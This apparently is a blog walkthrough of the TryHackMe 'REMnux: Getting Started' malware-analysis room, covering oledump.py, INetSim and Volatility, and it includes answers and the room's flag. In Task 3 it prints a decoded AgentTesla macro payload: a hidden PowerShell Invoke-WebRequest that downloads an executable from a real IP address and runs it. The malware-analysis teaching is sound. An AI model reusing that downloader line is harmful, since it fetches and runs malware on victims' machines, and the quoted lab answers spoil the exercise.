REMnux: Getting Started – TryHackMe Walkthrough

 


REMnux: Getting Started – TryHackMe Walkthrough

Analyzing potentially malicious software can be difficult, especially during an active security incident. Analysts need reliable tools and controlled environments to safely investigate suspicious files. In this lab, we explored the REMnux Virtual Machine, a Linux distribution designed specifically for malware analysis and reverse engineering.

REMnux comes preinstalled with powerful tools such as:

  • Volatility

  • YARA

  • Wireshark

  • oledump.py

  • INetSim

These tools allow analysts to perform static analysis, dynamic analysis, network simulation, and memory forensics without risking their main system.

Task 1: Introduction

The room introduces the REMnux VM, which provides a sandbox environment for analyzing malware.

Learning objectives include:

  • Exploring tools inside the REMnux VM

  • Analyzing malicious documents

  • Simulating fake networks

  • Investigating memory images

Answer:
No answer needed.

Task 2: Machine Access

In this task, the REMnux VM is launched using the Start Machine button. The machine loads in a split-screen view where the virtual machine appears on the right side of the TryHackMe interface.

Most files used in the lab are located in:

/home/ubuntu/Desktop/tasks

Answer:
No answer needed.

Task 3: File Analysis with oledump.py

We analyzed a suspicious Excel file named:

agenttesla.xlsm

The tool used was oledump.py, which analyzes OLE2 files (Object Linking and Embedding format).

Command used:

oledump.py agenttesla.xlsm

The output revealed several data streams, including a VBA macro located in:

VBA/ThisWorkbook

To analyze the macro:

oledump.py agenttesla.xlsm -s 4

To decompress the VBA script:

oledump.py agenttesla.xlsm -s 4 --vbadecompress

The macro contained an obfuscated PowerShell command that downloaded malware from the internet.

After decoding using CyberChef, the script became readable:

powershell -WindowStyle hidden -executionpolicy bypass
Invoke-WebRequest -Uri http://193.203.203.67/rt/Doc-3737122pdf.exe
Start-Process

This command downloads a malicious executable and runs it.

Answers

What Python tool analyzes OLE2 files?

Answer:
oledump.py

What parameter selects a specific data stream?

Answer:
-s

What PowerShell command downloads files from the internet?

Answer:
Invoke-WebRequest

What file was downloaded?

Answer:
Doc-3737122pdf.exe

Where was the file stored?

Answer:
$TempFile

How many data streams were found in possible_malicious.docx?

Answer:
16

Which data stream contained the macro?

Answer:
8

Task 4: Fake Network Simulation with INetSim

During malware analysis, we often want to observe network behavior safely. Instead of connecting to real internet servers, we can simulate them using INetSim.

INetSim creates fake services like:

  • HTTP

  • HTTPS

  • DNS

  • FTP

  • SMTP

Configuration

First, find the machine IP:

ifconfig

Then edit the INetSim configuration file:

sudo nano /etc/inetsim/inetsim.conf

Change:

dns_default_ip 0.0.0.0

to the machine's IP.

Start INetSim:

sudo inetsim

Once running, the fake network services are active.

Downloading Files from the Fake Server

Using the AttackBox terminal:

sudo wget https://MACHINE_IP/second_payload.zip --no-check-certificate

This simulates malware downloading a second payload.

INetSim logs all activity and stores it in:

/var/log/inetsim/report/

Answers

What is the flag in flag.txt?

Answer:
Tryhackme{remnux_edition}

What HTTP method was used to retrieve flag.txt?

Answer:
GET

Task 5: Memory Investigation (Volatility)

Memory forensics helps analysts investigate malware running in RAM.

We used Volatility 3 to analyze a memory image:

wcry.mem

Plugins used include:

  • PsTree

  • PsList

  • CmdLine

  • FileScan

  • DllList

  • PsScan

  • Malfind

Example command:

vol3 -f wcry.mem windows.pstree.PsTree

Automating Analysis

Instead of running plugins one by one, we used a loop:

for plugin in windows.malfind.Malfind windows.psscan.PsScan windows.pstree.PsTree windows.pslist.PsList windows.cmdline.CmdLine windows.filescan.FileScan windows.dlllist.DllList; do vol3 -q -f wcry.mem $plugin > wcry.$plugin.txt; done

This saves outputs into text files for later analysis.

Extracting Strings

We also extracted readable strings from the memory dump.

ASCII strings:

strings wcry.mem > wcry.strings.ascii.txt

Little-endian Unicode:

strings -e l wcry.mem > wcry.strings.unicode_little_endian.txt

Big-endian Unicode:

strings -e b wcry.mem > wcry.strings.unicode_big_endian.txt

Answers

Which plugin lists processes in a tree?

Answer:
PsTree

Which plugin lists active processes?

Answer:
PsList

Which Linux utility extracts ASCII and Unicode strings?

Answer:
strings

First process suspected of injected code?

Answer:
csrss.exe

Second process suspected of injected code?

Answer:
winlogon.exe

Directory of @WanaDecryptor@.exe?

Answer:
C:\Intel\ivecuqmanpnirkt615

Conclusion

This room provided a practical introduction to the REMnux malware analysis environment.

We learned how to:

  • Analyze malicious documents with oledump.py

  • Decode obfuscated PowerShell commands

  • Simulate network activity with INetSim

  • Preprocess memory images using Volatility

  • Extract forensic artefacts using strings

REMnux contains many more tools for advanced malware analysis, and mastering them can significantly improve a cybersecurity analyst's investigation capabilities.

Comments

Post a Comment

Popular Posts